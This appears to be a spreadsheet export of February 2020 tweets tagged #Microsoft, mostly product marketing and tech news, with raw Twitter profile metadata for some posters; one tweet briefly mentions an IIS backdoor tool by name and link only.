    <t>Join us in DCI's high tech labs throughout Connecticut! Work on cool projects and earn credentials that employers want! #coding #careergoals #Technology #Cybersecurity #Programming #CompTIA #Cisco #Microsoft #jobs... https://t.co/aOUqcSEiuL</t>
  </si>
  <si>
    <t>Wed Feb 26 15:07:33 +0000 2020</t>
  </si>
  <si>
    <t>Azure Sphere for IoT generally available https://t.co/zZHqVU4ffw #Security #Azure #AzureSphere #IoT #Microsoft @techzineeu https://t.co/7MlOiQi0z9</t>
  </si>
  <si>
    <t>{'id': 1168954887826227207, 'id_str': '1168954887826227207', 'name': 'Techzine Europe', 'screen_name': 'techzineeu', 'location': 'Netherlands', 'description': 'âœˆï¸ #Techzine covers the world of #technology\nðŸ•µï¸\u200dâ™‚ï¸ #IT #Cloud #Security #Data #Devops\nðŸ”Research &amp; analyse #enterprise solutions\nâ­ Learn more: https://t.co/8HYw418ykF', 'url': 'https://t.co/gpnZhD2ouq', 'entities': {'url': {'urls': [{'url': 'https://t.co/gpnZhD2ouq', 'expanded_url': 'https://www.techzine.eu', 'display_url': 'techzine.eu', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/8HYw418ykF', 'expanded_url': 'http://www.techzine.eu', 'display_url': 'techzine.eu', 'indices': [142, 165]}]}}, 'protected': False, 'followers_count': 1891, 'friends_count': 687, 'listed_count': 5, 'created_at': 'Tue Sep 03 18:32:29 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 823, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1168956693948096513/nl1asOnw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1168956693948096513/nl1asOnw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1168954887826227207/1571049196',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</si>
  <si>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15:06:49 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/7bemBEkGsN</t>
  </si>
  <si>
    <t>Wed Feb 26 15:06:37 +0000 2020</t>
  </si>
  <si>
    <t>We've got your back! Get help putting #technology in your school through #Microsoft's online tools. Select, deploy, and learn-it's easy as 1-2-3!     #EducationalTechnology #K12 #MicrosoftEducation #Windows10 https://t.co/zW6veHQE8Y</t>
  </si>
  <si>
    <t>Wed Feb 26 15:06:19 +0000 2020</t>
  </si>
  <si>
    <t>Uncover insights to help streamline processes, boost productivity, and gain an edge over your competitors with #Microsoft #PowerBI. Subscribe to learn more! https://t.co/sC850ITgTH</t>
  </si>
  <si>
    <t>Wed Feb 26 15:05:27 +0000 2020</t>
  </si>
  <si>
    <t>Who doesn't want to streamline accounting, better manage costs, and connect with customers? Excellent article on #growthhacks for small businesses. Check it out here:     #Microsoft #Technology #IT #BusinessAutomation https://t.co/3nhVDHkQjG</t>
  </si>
  <si>
    <t>Wed Feb 26 15:05:25 +0000 2020</t>
  </si>
  <si>
    <t>Institutions with paper-intensive tasks and onsite servers are especially prone to data loss and cyber attacks. Follow us to stay updated on how to protect your organization with #Microsoft. https://t.co/GtRZOdwdjl</t>
  </si>
  <si>
    <t>Wed Feb 26 15:04:45 +0000 2020</t>
  </si>
  <si>
    <t>Put today's data explosion to work for your business with #Microsoft #PowerBI and #Azure. Place data at your entire organization's fingertips, enabling anyone to transform business data into actionable insights. Subscribe now. https://t.co/hRffAZFTlL</t>
  </si>
  <si>
    <t>Wed Feb 26 15:04:43 +0000 2020</t>
  </si>
  <si>
    <t>Udemy Free Discount - R Programming: Advanced Analytics In R For Data Science #udemycoupon -&amp;gt; https://t.co/YwJ6bVwv81
#DataScience #MachineLearning #Python #DataAnalysis #DeepLearning #SQL #ArtificialIntelligence #Microsoft #PowerBI #Tableau #BigData #hadoop #100DaysOfCode</t>
  </si>
  <si>
    <t>Wed Feb 26 15:03:47 +0000 2020</t>
  </si>
  <si>
    <t>Put today's data explosion to work for your business with #Microsoft #PowerBI and #Azure. Place data at your entire organization's fingertips, enabling anyone to transform business data into actionable insights. Subscribe now. https://t.co/J0c2QQb3Kb</t>
  </si>
  <si>
    <t>Wed Feb 26 15:02:57 +0000 2020</t>
  </si>
  <si>
    <t>In more tech news, these next gaming consoles are gonna be amazing! But definitely expensive. Rumors have been swirling that the PS5 will be priced at or around $500. #gaming #nextgen #sony #Microsoft @Sony</t>
  </si>
  <si>
    <t>{'id': 57522163, 'id_str': '57522163', 'name': '#MacGyverswagg', 'screen_name': 'FromHood2Pr3p', 'location': 'where the hood is everywhere', 'description': '#BMoreallday Memeber of #BallsohardUniv and #Ravensnation #JHUALUM ~Striving for Greatness~  What more can I say?', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 296, 'friends_count': 572, 'listed_count': 1, 'created_at': 'Fri Jul 17 02:19:38 +0000 2009', 'favourites_count': 659, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6520, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '000305', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/430000270027018240/PqsZzfN-_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/430000270027018240/PqsZzfN-_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/57522163/1391889182', 'profile_link_color': '4F07AD',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</si>
  <si>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15:02:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Threat Protection stops attack sprawl and auto-heals enterprise assets with built-in intelligence and automation
https://t.co/Ft0A5zj1nU 
@msftsecurity</t>
  </si>
  <si>
    <t>Wed Feb 26 15:02:14 +0000 2020</t>
  </si>
  <si>
    <t>join us Tuesday as we provide you with the tools you need to tackle the data governance challenge, hear from #Microsoft governance specialist @GDPRQueen  @LpoolCityRegion on their challenges and our own team sharing their experience-something for everyone https://t.co/FrFOkIorxe https://t.co/T1TMLc0T1d</t>
  </si>
  <si>
    <t>{'id': 47998029, 'id_str': '47998029', 'name': 'Gardner Systems', 'screen_name': 'gardnersystems', 'location': 'Liverpool', 'description': 'Liverpool based IT company with 30 years experience in providing services to SMB and Enterprise customers', 'url': 'http://t.co/cnPFGLWn1A', 'entities': {'url': {'urls': [{'url': 'http://t.co/cnPFGLWn1A', 'expanded_url': 'http://www.gardnersystems.co.uk', 'display_url': 'gardnersystems.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 294, 'friends_count': 93, 'listed_count': 55, 'created_at': 'Wed Jun 17 15:33:54 +0000 2009', 'favourites_count': 37, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2606, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'BD0D0D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/267182655/clip_image003_0001_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/267182655/clip_image003_0001_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47998029/1403279985', 'profile_link_color': '990000',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</si>
  <si>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Wed Feb 26 15:01:18 +0000 2020</t>
  </si>
  <si>
    <t>7 things #Microsoft didn't tell us about the new #Office #app https://t.co/9Ne6sqpPY1 #iOS #Android #Tech #TechNews #Technology #TechnologyNews #ITRTG #SNRTG https://t.co/IBeTWippW1</t>
  </si>
  <si>
    <t>Wed Feb 26 15:01:03 +0000 2020</t>
  </si>
  <si>
    <t>"Share and manage content, knowledge, and applications to empower #teamwork, quickly find information, and seamlessly #collaborate across the #organisations."
Read more about #SharePoint:
https://t.co/XMtac51odi
#Office365 #Microsoft #Business #ManagedTechnology https://t.co/1RNwXH4wKd</t>
  </si>
  <si>
    <t>Wed Feb 26 15:01:00 +0000 2020</t>
  </si>
  <si>
    <t>Style. Fashion. Function. Our Skinny Sleeves do it all! 
.
.
.
#SkinnySleeve #LaptopSleeve #AirPods #BlueBlockers #Apple #SurfacePro #Microsoft #Style #Fashion #AcmeMade https://t.co/Yo09l3rhBf</t>
  </si>
  <si>
    <t>Wed Feb 26 15:00:47 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 15:00:41 +0000 2020</t>
  </si>
  <si>
    <t>Empower teams to do more and achieve more with modern collaboration and workplace solution - Office 365! 
Our Office 365 consulting services allow your business and teams to  achieve the best they can: https://t.co/Q0PUdmFgj5
#Office365 #Microsoft #O365Consultant https://t.co/RNNTUXLIgY</t>
  </si>
  <si>
    <t>{'id': 716494420888006660, 'id_str': '716494420888006660', 'name': 'Star Knowledge', 'screen_name': 'Star_Knowledge', 'location': '', 'description': 'With global outreach, Star Knowledge partners with enterprises to develop cost effective ground breaking technology solutions that make a positive impact !!', 'url': 'https://t.co/LA30YQnSKL', 'entities': {'url': {'urls': [{'url': 'https://t.co/LA30YQnSKL', 'expanded_url': 'https://www.star-knowledge.com', 'display_url': 'star-knowledge.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 111, 'friends_count': 422, 'listed_count': 11, 'created_at': 'Sun Apr 03 05:15:56 +0000 2016', 'favourites_count': 120, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 565,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'http://pbs.twimg.com/profile_images/963715007786569728/Ka6AcKve_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/963715007786569728/Ka6AcKve_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/716494420888006660/1517918445',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</si>
  <si>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15:00:30 +0000 2020</t>
  </si>
  <si>
    <t>Watch our new video show casing CopyRight2's IIS Migration Add-on simplifying Microsoft IIS FTP &amp;amp; web server migrations. https://t.co/xuMVuwXfRQ #it #Microsoft #Windows #IIS #ActiveDirectory #WinServ #WinSrv #WindowsServer #NetworkAdmin #storage #sysadmin #ITpro #TechSupport</t>
  </si>
  <si>
    <t>Wed Feb 26 15:00:04 +0000 2020</t>
  </si>
  <si>
    <t>What You Can Expect From the Next Generation of Gaming via Phil Spencer #Microsoft https://t.co/q32RYvsVMH</t>
  </si>
  <si>
    <t>Wed Feb 26 14:58:45 +0000 2020</t>
  </si>
  <si>
    <t>We are excited to announce that we have become an official @Kentico solution partner! Please read our press release for the full story. https://t.co/TTBCZ4w9Cm #Kentico #CMS #Microsoft #dotnet https://t.co/pgC0309C9R</t>
  </si>
  <si>
    <t>{'id': 906337055109763072, 'id_str': '906337055109763072', 'name': 'Northsail Software', 'screen_name': 'northsailio', 'location': 'Waterloo, Ontario', 'description': 'Our crew builds incredible custom web applications for startups to large enterprises and everything in between.', 'url': 'https://t.co/qyrEWjz0x0', 'entities': {'url': {'urls': [{'url': 'https://t.co/qyrEWjz0x0', 'expanded_url': 'https://northsail.io', 'display_url': 'northsail.io', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 140, 'friends_count': 290, 'listed_count': 4, 'created_at': 'Sat Sep 09 02:02:47 +0000 2017', 'favourites_count': 65, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 312,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'http://pbs.twimg.com/profile_images/933740235120414720/_KMhPaWF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933740235120414720/_KMhPaWF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/906337055109763072/1515873883',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</si>
  <si>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14:56:05 +0000 2020</t>
  </si>
  <si>
    <t>Very excited! My Y12 pupils working collaboratively over holiday on #microsoft @sway to create a digital story of about recent fieldwork in Barcelona. They have included their own media and research. QR codes created for wall display and beyond! @Dunelmia @microsofteduk #edtech https://t.co/t3Npb8RJiS</t>
  </si>
  <si>
    <t>{'id': 1198376616298262528, 'id_str': '1198376616298262528', 'name': 'Sarah Buist', 'screen_name': 'SarahBuist2', 'location': '', 'description': 'Geography teacher, Edexel Examiner, loves anything new and tech in education.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 145, 'listed_count': 0, 'created_at': 'Sat Nov 23 23:03:57 +0000 2019', 'favourites_count': 302, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 71, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1198378291427790848/P7KjYoIR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198378291427790848/P7KjYoIR_normal.jpg',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</si>
  <si>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14:55:47 +0000 2020</t>
  </si>
  <si>
    <t>Get a Free 2-hour Teams Quick Launch at https://t.co/m2gtxnZQYP #microsoftteams #microsoft
#splicenet https://t.co/l5UsAv0THy</t>
  </si>
  <si>
    <t>{'id': 88090710, 'id_str': '88090710', 'name': 'Jim GastðŸ‘¨\u200dðŸ’»www.linkedin.com/in/jamesgast', 'screen_name': 'jimgast', 'location': 'Cincinnati, OH', 'description': 'Helping lawyers &amp; their staff transform work efficiency using technology so they can create raving fan clients &amp; get more client referralsâ­ï¸Follow me for tips', 'url': 'https://t.co/7ebkpCXaUp', 'entities': {'url': {'urls': [{'url': 'https://t.co/7ebkpCXaUp', 'expanded_url': 'http://www.linkedin.com/in/jamesgast', 'display_url': 'linkedin.com/in/jamesgast', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 272, 'friends_count': 919, 'listed_count': 7, 'created_at': 'Sat Nov 07 02:12:31 +0000 2009', 'favourites_count': 87, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1025,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'http://pbs.twimg.com/profile_images/733690919032131584/qfzeACFE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/733690919032131584/qfzeACFE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/88090710/1564922204',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</si>
  <si>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14:54:59 +0000 2020</t>
  </si>
  <si>
    <t>Belgium ahoy!  @xGokan will guide you thru the basics and the dirty secrets of #MicrosoftTeams at this #ValoPremiumPartner @AMPLEXOR lunchtime workshop on March 24, 2020!  
Register here  https://t.co/olHINbAiai
#MSTeams #Office365 #SharePoint #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 14:54:15 +0000 2020</t>
  </si>
  <si>
    <t>WonderLaura: #SPC20 will be the largest &amp;amp; most comprehensive #SharePoint &amp;amp; #Microsoft 365 event in the world! https://t.co/p0T054fLBo</t>
  </si>
  <si>
    <t>Wed Feb 26 14:51:08 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft #Dynamics365     The Federation Internationale de Volleyball is using #Dynamics365 to keep young people across the world connected with the sport and ensure a thriving future for players and fans everywhere. https://t.co/yNSzxlsgZI</t>
  </si>
  <si>
    <t>Wed Feb 26 14:50:49 +0000 2020</t>
  </si>
  <si>
    <t>#Google and #Microsoft accelerating efforts to shift production of new phones, personal computers, etc. from #China to Southeast Asia amid the worsening coronavirus outbreak. Factories in #Vietnam and #Thailand largest beneficiaries. https://t.co/8YTt1TyNKs</t>
  </si>
  <si>
    <t>{'id': 93156572, 'id_str': '93156572', 'name': 'Jim Laurie - focus on Asia', 'screen_name': 'FocusAsia', 'location': 'In Washington March 1', 'description': "Jim Laurie ç½—ç¤¼è´¤ - His consulting and production firm is 'Focus Asia Ltd' since 2005. Jim following Asia: esp. China, Vietnam and Cambodia since the 1970's!", 'url': 'https://t.co/ijAm3DOkHz', 'entities': {'url': {'urls': [{'url': 'https://t.co/ijAm3DOkHz', 'expanded_url': 'http://www.jimlaurie.com', 'display_url': 'jimlaurie.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 667, 'friends_count': 548, 'listed_count': 16, 'created_at': 'Sat Nov 28 10:12:01 +0000 2009', 'favourites_count': 1778, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 7361,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'http://pbs.twimg.com/profile_images/474938816013144065/gTB_3xpl_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/474938816013144065/gTB_3xpl_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/93156572/1549951239',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</si>
  <si>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14:47:47 +0000 2020</t>
  </si>
  <si>
    <t>'Design Ideas' feature in Powerpoint is probably one of the best examples of UX on legacy software solutions from #Microsoft.
#Powerpoint #greatfeature #designideas</t>
  </si>
  <si>
    <t>{'id': 98056079, 'id_str': '98056079', 'name': 'Apoorva Mishra', 'screen_name': 'apswin', 'location': 'Los Angeles', 'description': 'Actively seeking summer 2020 internship in product management - UCLA Anderson - Indian School of Business - IIT,Roorkee - Analytics, MBA, Software Engineering', 'url': 'https://t.co/bi7FkC2h8y', 'entities': {'url': {'urls': [{'url': 'https://t.co/bi7FkC2h8y', 'expanded_url': 'https://www.linkedin.com/in/apoorva-mishra/', 'display_url': 'linkedin.com/in/apoorva-misâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 115, 'friends_count': 608, 'listed_count': 1, 'created_at': 'Sun Dec 20 05:18:05 +0000 2009', 'favourites_count': 331, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 325,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'http://pbs.twimg.com/profile_images/1180755018779021312/T9XOag24_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180755018779021312/T9XOag24_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/98056079/1570348882',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</si>
  <si>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14:46:02 +0000 2020</t>
  </si>
  <si>
    <t>#Google displays warning in #Microsoft Edge encouraging users to switch to Chrome https://t.co/vIg0J62fem https://t.co/NbNf57IEg0</t>
  </si>
  <si>
    <t>Wed Feb 26 14:45:17 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Flow and #PowerApps often go hand in hand. A great way to utilize the two in tandem is to allow a PowerApp to initiate a Flow and feed the Flow that information which is already provided in the PowerApp Form.
Learn more:
https://t.co/MDupacCysQ https://t.co/uTu9VHGDxI</t>
  </si>
  <si>
    <t>Wed Feb 26 14:45:07 +0000 2020</t>
  </si>
  <si>
    <t>#SPC20 will be the largest &amp;amp; most comprehensive #SharePoint &amp;amp; #Microsoft 365 event in the world! https://t.co/Fy3HshnUL4</t>
  </si>
  <si>
    <t>Wed Feb 26 14:35:33 +0000 2020</t>
  </si>
  <si>
    <t>Setup And Configure SAP Backups And Disaster Recovery #Azure 
https://t.co/O6MPVofcdn 
@CoastIot  @SNikkhah  @CsharpCorner #microsoft #cloud #mvpbuzz #microsoftazure #msftadvocate #cloudsecurity #iotshow</t>
  </si>
  <si>
    <t>{'id': 1213204092, 'id_str': '1213204092', 'name': 'Deepak Kaushik', 'screen_name': 'ThinkForDeepak', 'location': 'ðŸ‡¨ðŸ‡¦ ðŸŒŽ ', 'description': 'Cloudâ˜ï¸ Blooded Beast -Microsoft MVP|#MSIgnite| C#Corner MVP| Azure DWH| Data Science| PowerBI. UserGroup Lead -a Karma Yogi *Tweets= MY OWN*. ðŸ‡¨ðŸ‡¦O Canada ðŸ‡¨ðŸ‡¦', 'url': 'https://t.co/o7W5HUWbeY', 'entities': {'url': {'urls': [{'url': 'https://t.co/o7W5HUWbeY', 'expanded_url': 'https://deepak-kaushik.com', 'display_url': 'deepak-kaushik.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 820, 'friends_count': 428, 'listed_count': 46, 'created_at': 'Sat Feb 23 18:43:11 +0000 2013', 'favourites_count': 4922, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2425,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'http://pbs.twimg.com/profile_images/982303024642011136/q8K8EAzY_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/982303024642011136/q8K8EAzY_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1213204092/1520602595',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</si>
  <si>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14:33:02 +0000 2020</t>
  </si>
  <si>
    <t>@Oracle is upping its game in the race against #Microsoft and #Amazon for #cloud computing market share. @Reuters #cdwsocial https://t.co/CJWhzaG5Ci</t>
  </si>
  <si>
    <t>Wed Feb 26 14:32:41 +0000 2020</t>
  </si>
  <si>
    <t>Former Microsoft Employee Found Guilty For Stealing $10M And Laundering With Bitcoin
https://t.co/491bE2l77m
#Cryptocurrency #CryptoInvestor #CryptoNews #CryptoLove #Bitcoin #Ethereum #Ripple #eth #btc #xrp #Binance #Bittrex #Gemini #Blockchain #CryptoExchanges #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 14:32:24 +0000 2020</t>
  </si>
  <si>
    <t>For all those who cannot attend #Microsoft Ignite The Tour check 
              #MSIgniteTheTour hashtag
 to stay updated with recent news and announcements 
#Microsoft #MicrosoftLife #Coding #Azure #Cloud #IoT #SoftwareEngineering https://t.co/XlFKdDg086</t>
  </si>
  <si>
    <t>Wed Feb 26 14:32:23 +0000 2020</t>
  </si>
  <si>
    <t>I want to know more about totally free Hillary Clinton #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 14:31:41 +0000 2020</t>
  </si>
  <si>
    <t>Last week, James Phillips of Microsoft announced new AI features across the organization. 
https://t.co/4LGNBAaMCP #AI #customerinsights #Microsoft</t>
  </si>
  <si>
    <t>Wed Feb 26 14:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Wed Feb 26 14:28:59 +0000 2020</t>
  </si>
  <si>
    <t>This is a great example of letting open source platform @github grow in it's own way despite being acquired by @Microsoft
#opensource #Microsoft #github
Why does GitHub use AWS S3 if it is owned by Microsoft? Shouldn't it use Azure instead? https://t.co/tl754vJVNA</t>
  </si>
  <si>
    <t>{'id': 606095577, 'id_str': '606095577', 'name': 'Rajeev Jaiswal', 'screen_name': 'rvrkj', 'location': 'Chennai, India', 'description': 'Connecting Dots', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 727, 'friends_count': 4994, 'listed_count': 12, 'created_at': 'Tue Jun 12 04:34:23 +0000 2012', 'favourites_count': 10076, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1381, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '89C9FA', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196470109436403712/4_M9Zy8K_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196470109436403712/4_M9Zy8K_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/606095577/1508677229', 'profile_link_color': '1DA1F2',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</si>
  <si>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Wed Feb 26 14:28:02 +0000 2020</t>
  </si>
  <si>
    <t>You ready for 100s of new features in #Microsoft's Wave 1 set of updates for Dynamics 365 CRM and ERP and Power Platform? I am! @ZDNet #cdwsocial https://t.co/5e7qVn7Iau</t>
  </si>
  <si>
    <t>Wed Feb 26 14:27:02 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft is slowly pulling the curtain back on its dual-screen Surface Duo and #Surface Neo. @TechCrunch #cdwsocial https://t.co/OTw8z5c1aW</t>
  </si>
  <si>
    <t>Wed Feb 26 14:25:12 +0000 2020</t>
  </si>
  <si>
    <t>Custom #AzureSphere #WindowsTerminal Developer Command Prompt
 #CLI #Azure #Microsoft #AzureFamily
https://t.co/GeUIpWie90</t>
  </si>
  <si>
    <t>Wed Feb 26 14:22:53 +0000 2020</t>
  </si>
  <si>
    <t>IIS-Raid:-- A native #backdoor module for #Microsoft #IIS (#Internet #Information #Services).
IIS Raid is a native IIS module that abuses the extendibility of IIS to backdoor the #webserver and carries out custom actions defined by an #attacker.
https://t.co/IGFCoF20GG</t>
  </si>
  <si>
    <t>Wed Feb 26 14:20:35 +0000 2020</t>
  </si>
  <si>
    <t>Do you have #office365? get the most out of the apps available at your fingertips with our downloadable guide: https://t.co/iZBOIIY1L7 
#PowerBI #Excel #Microsoft #Teams #Flow #PowerPoint #MicrosoftPlanner https://t.co/LCnMEvgRnn</t>
  </si>
  <si>
    <t>Wed Feb 26 14:20:00 +0000 2020</t>
  </si>
  <si>
    <t>If you missed our recent presentation on Digital Transformation for #Microsoft #DynamicsAX and #D365FO, you can still watch the recording! https://t.co/hkcTC6orlW
#MSDynAX #MSDyn365FO #ERP  #EDIMadeSimple #EDI https://t.co/8XI77e6Ar2</t>
  </si>
  <si>
    <t>Wed Feb 26 14:19:33 +0000 2020</t>
  </si>
  <si>
    <t>Go to https://t.co/046Lp3cgMS and #download this High Level #Deployment #schedule designed in #PowerPoint point  - #Simple #Solutions for all #Businesses 
#Microsoft #Design #HR #docs #Document #Template #picture #cool #register #easy #earn #money #startups https://t.co/hB72kDMPJG</t>
  </si>
  <si>
    <t>Wed Feb 26 14:17:39 +0000 2020</t>
  </si>
  <si>
    <t>Im coming to this DevCon event tomorrow! Excited to see @satyanadella on the stage! Anyone coming? #DevCon #microsoft #DigitalEconomySummit2020 https://t.co/Gi3dq9VVh4</t>
  </si>
  <si>
    <t>{'id': 26254110, 'id_str': '26254110', 'name': 'Annisa M', 'screen_name': 'muliannisa', 'location': 'Jakarta Capital Region, Indonesia', 'description': 'helping asiaâ€™s tech &amp; startup community grow thru @techinasia_id | content strategist', 'url': 'https://t.co/9HuvVKuJFT', 'entities': {'url': {'urls': [{'url': 'https://t.co/9HuvVKuJFT', 'expanded_url': 'http://muliannisa.tumblr.com', 'display_url': 'muliannisa.tumblr.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 518, 'friends_count': 689, 'listed_count': 13, 'created_at': 'Tue Mar 24 15:10:51 +0000 2009', 'favourites_count': 2151, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 53462, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'BADFCD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme2/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1232669474098008066/DQE9SIDK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232669474098008066/DQE9SIDK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/26254110/1566656374', 'profile_link_color': 'FF0000', 'profile_sidebar_border_color': 'F2E195', 'profile_sidebar_fill_color': 'FFF7CC', 'profile_text_color': '0C3E53', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 14:15:18 +0000 2020</t>
  </si>
  <si>
    <t>Train for the Microsoft Azure Administrator certification and save 30%. For a limited time, all Microsoft Guaranteed to Run courses are discounted. https://t.co/FcTN1FhVzc #Microsoft #Azure #ittraining #specialoffer https://t.co/cPravD1wrO</t>
  </si>
  <si>
    <t>{'id': 19659846, 'id_str': '19659846', 'name': 'GKonMicrosoft', 'screen_name': 'GKonMicrosoft', 'location': '', 'description': 'You got Microsoft questions, we got answers. Ask us here. We provide end-to-end Microsoft training, certification prep, how-to tips and resources.', 'url': 'https://t.co/yOAEkFRT0z', 'entities': {'url': {'urls': [{'url': 'https://t.co/yOAEkFRT0z', 'expanded_url': 'https://www.globalknowledge.com/microsoft', 'display_url': 'globalknowledge.com/microsoft', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5099, 'friends_count': 819, 'listed_count': 194, 'created_at': 'Wed Jan 28 16:23:13 +0000 2009', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5392, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '003366', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/517324229746774016/Q14zA_G__normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/517324229746774016/Q14zA_G__normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/19659846/1560812432', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'BAD8E9', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Wed Feb 26 14:15:00 +0000 2020</t>
  </si>
  <si>
